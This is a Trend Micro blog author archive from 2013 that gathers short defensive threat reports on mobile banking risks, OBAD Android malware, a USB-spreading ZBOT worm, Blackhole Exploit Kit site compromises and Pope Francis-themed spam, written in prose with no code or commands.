Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Zero-Day Alerts

  • Hacking Team Leak

  • Recent Posts

  • Calendar

    August 2015
    S M T W T F S
    « Jul    
  • Email Subscription

  • About Us

    Author Archive - Abigail Pichel (Technical Communications)

    Online banking is one of the many tasks that have been made more convenient by mobile technology. Now, users can purchase products and/or services, pay their bills and manage their finances from anywhere, and anytime. However, there are threats against mobile banking exist, which need to be addressed and secured against.

    Some of these threats include:

    • Mobile phishing – malicious mobile websites that pass themselves off as login websites of legitimate organizations, such as banks and social networks. These are designed to trick users into entering their login information. So far, in this quarter, nearly half of all mobile phishing websites spoof financial services websites.
    • Malicious apps – Apps that contain malicious routines, such as stealing information from the device they’ve been installed on. These are usually found either in third-party app stores or malicious websites, and frequently passed off as legitimate apps.
    • Trojanized apps – Legitimate apps that have been turned into malicious apps. These are more dangerous because to the end user, they are completely indistinguishable from the real app. Because of this, the malicious app – and its routines – could be running for a long time, long before the user even suspects anything.


    Figure 1. Distribution of types of mobile phishing pages in Q3 2013 to date

    While banks are taking steps to reduce losses due to mobile banking, in the end users – both individuals and businesses – must take steps to protect themselves. Users should be familiar with their bank’s mobile banking procedures, in order to more easily spot things that are “off” and could indicate an attack. In general, too, good computing habits will help keep users secure.

    Businesses need to understand and educate their staff about the risks related to online banking, so that the bottom line is not at risk from these threats. This may include guidelines on whether employees can/should use mobile banking from personal devices. In addition, businesses should work together with their bank to look into possible procedures and steps to reduce known risks.

    For more information about mobile banking and how to secure it, we have recently released the latest edition of our Monthly Mobile Report titled Security in Mobile Banking, as well as an e-guide. These discuss the basics of mobile banking, and how they should be secured.

    Posted in Mobile | Comments Off on The Ghost in the (Portable) Machine: Securing Mobile Banking

    The discovery (and subsequent media coverage) of the mobile malware OBAD shows that mobile threats continue to be a serious concern for users.  Just like Windows malware, mobile malware are also becoming more sophisticated, both in technique and deployment. This confirms one of our 2013 security predictions.

    OBAD exploits an Android vulnerability to avoid detection and uninstallation. OBAD’s propagation method is notable because of its use of Bluetooth, a routine previously seen in Symbian malware.

    FAKEAV mobile malware routines now include pop-up windows and messages about “infected” apps. Rather than show persistent notifications, mobile ads now lead users to web threats.

    These refinements take advantage of characteristics of the current mobile landscape. Android vulnerabilities are exploited because Android fragmentation makes it difficult to address vulnerabilities. This concern on Android’s update issues may contribute to the growing concerns about mobile malware, making it easy for users to become victims of mobile FAKEAV.

    Our latest monthly mobile report discusses these emerging threats, issues affecting or influencing these threats, and what you can do to help secure your devices better.

    Posted in Mobile | Comments Off on How PC Threats Go Mobile

    Who says you can’t teach old malware new tricks? Recently, we reported on how ZBOT had made a comeback of sorts in 2013; this was followed by media reports that it was now spreading via Facebook. Now, we have spotted a new ZBOT variant that can spread on its own.

    This particular ZBOT variant arrives through a malicious PDF file disguised as a sales invoice document. If the user opens this file using Adobe Reader, it triggers an exploit which causes the following pop-up window to appear:

    Figure 1. The error message upon execution of the malicious PDF file

    While this is going on, the malicious ZBOT variant – WORM_ZBOT.GJ – is dropped onto the system and run. It is here that several differences start to appear.

    First of all, WORM_ZBOT.GJ has an autoupdate routine: it can download and run an updated copy of itself. Secondly, however, it can spread onto other systems via removable drives, like USB thumb drives.

    It does thus by searching for removable drives and then creating a hidden folder with a copy of itself inside this folder, and a shortcut pointing to the hidden ZBOT copy.

    Figure 2. WORM_ZBOT.GJ Infection Chain

    Figure 3. Portion of WORM_ZBOT.GJ code creating copy of itself

    This kind of propagation by ZBOT is unusual, to say the least. ZBOT malware is usually distributed by exploit kits and/or malicious attachments. This kind of behavior from ZBOT is not something we’d usually expect to see; it could mean an increase in ZBOT infections moving forward. This unusual behavior, however, is in line with our 2013 predictions, which noted that we believed that older threats would continue to be seen in 2013, although they would have refinements to make them more effective. In the past, some ZBOT variants have used unusual means – like file infectors – to spread as well.

    These threats are some of the newest changes to the crimeware landscape; we earlier documented this particular threat in the paper The Crimeware Evolution. Neither propagating via removable drives nor auto-updating are particularly novel; many malware threats have used these behaviors in the past. Most notably, the Conficker/DOWNAD threat used both of these quite effectively; to this day it is a significant threat. It’s still in the top 10 malware in the Americas and Carribean in 2012, despite it being several years old.

    We protect Trend Micro users by detecting WORM_ZBOT.GJ, as well as as blocking websites related to this threat. We will provide additional information if necessary to protect our users.

    With analysis from Threat Response Engineers Joie Salvio and Alvin Bacani

    Posted in Malware | 1 TrackBack »

    When it comes to cybercriminal targets, it truly is a popularity contest. Multiple sites were found compromised, including those popular with Japanese users. There were 40 compromised domains identified using feedback provided by Trend Micro Deep Discovery; since yesterday almost 60,000 hits have been recorded on these sites.

    One of the compromised sites contains an obfuscated JavaScript (detected as JS_BLACOLE.SMTT) designed to load a hidden iframe that loads behind the user’s browser.

    Figure 1. Encrypted JavaScript inserted onto compromised site

    Figure 2. Decrypted JavaScript that could lead users to malicious sites

    Figure 1 shows the obfuscated JavaScript, or JS_BLACOLE.SMTT, that’s on the compromised site. Figure 2 shows the decrypted JavaScript, which leads users to more malicious sites.

    The hidden iframe loads a .PHP file (detected as JS_BLACOLE.MT) that checks which software are installed in the user’s computer. After checking, it then loads the appropriate exploits. These lead to the download of malicious PDF files, which exploit an old vulnerability (CVE-2010-0188) in Adobe Reader and Acrobat. Other software applications targeted for exploits include Java and Flash. This behavior indicates that the attacker used the Blackhole Exploit Kit in these attacks.

    Users should remember that cybercriminals are catching up with the digital landscape. They will take advantage of any online activity—no matter how mundane—to gain more victims. They are also not selective; one of  the (compromised) sites caters to both students and businesses.

    End users should ensure that their installed software is patched, as this can prevent attacks that use old exploits – like this one – from succeeding. Site owners should exercise similar precautions with their installed server software – particularly content management systems – and ensure that their own passwords are sufficiently random and difficult to guess by attackers. Inputs should be sanitized as well, to prevent SQL injection attacks.

    Trend Micro provides protection by blocking related malicious sites and detecting the malware.

    With additional inputs from Threat Researcher Rhena Inocencio and Threats Analyst Yoshikawa Takashi.

    Update as of June 5, 2:15 AM PDT

    The malicious PDF files noted earlier in this post are detected as TROJ_PIDIEF.MT. The files downloaded by this malware are saved with legitimate filenames. however they are non-executable and non-malicious files despite their .EXE extension. However, the files could easily be replaced by malware; it is possible that this attack was still being tested when it was released into the wild.

    Posted in Exploits, Malware | Comments Off on Compromised Japanese Sites Lead to Malware

    With the amount of media coverage surrounding this year’s papal conclave and inauguration, it’s hardly a surprise that cybercriminals have taken advantage of this event to victimize users. We recently spotted spam that use newly-elected Pope Francis as the subject.

    These email messages use the new pope and controversies surrounding the Catholic Church to pique the recipients’ curiosity. To convince users of the legitimacy of the emails, these cite CNN as the alleged source. A screenshot of an email can be seen below:

    Figure 1. Sample spam entry

    It should be noted that while the topic is supposedly about Pope Francis, the email below calls the new pope Benedict, which is actually the name used by his predecessor.

    Figure 2. Spam entry with wrong headline

    The embedded links lead users to sites which have been compromised by Blackhole Exploit Kits (BHEK). Blackhole Exploit Kits have been used to deliver a wide variety of malware incuding:

    • Infostealers
    • Backdoors
    • Remote Access Trojans (RATs)
    • Rootkits

    We detect and block all related spammed messages and all associated URLs.

    As for the related malware, we found out that the final payload (detected as TROJ_PIDIEF.SMXY) exploits CVE-2009-0927, a dated vulnerability in Adobe Reader and Acrobat, to perform its routines. Thus, users must ensure that their systems are up-to-date with the latest software update.

    Read the rest of this entry »

    Posted in Bad Sites, Exploits, Malware, Spam | Comments Off on Spammers Bless New Pope with Spam


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice